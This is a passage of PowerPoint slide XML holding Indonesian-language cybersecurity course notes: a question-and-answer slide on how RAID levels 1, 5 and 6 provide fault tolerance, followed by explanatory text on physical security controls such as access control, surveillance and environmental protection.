          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. How does RAID support fault tolerance?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>RAID (Redundant Array of Independent/Inexpensive Disks) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> fault tolerance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>redundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> disk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>walaupun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>RAID 1 (mirroring):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digandakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di 2 disk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>RAID 5 (striping with parity):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data + parity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 1 disk failure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>RAID 6:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2 disk failure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RAID, availability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hardware.</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166</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52493310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Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Langkah-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> video, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengintegrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlapis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Fisik</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
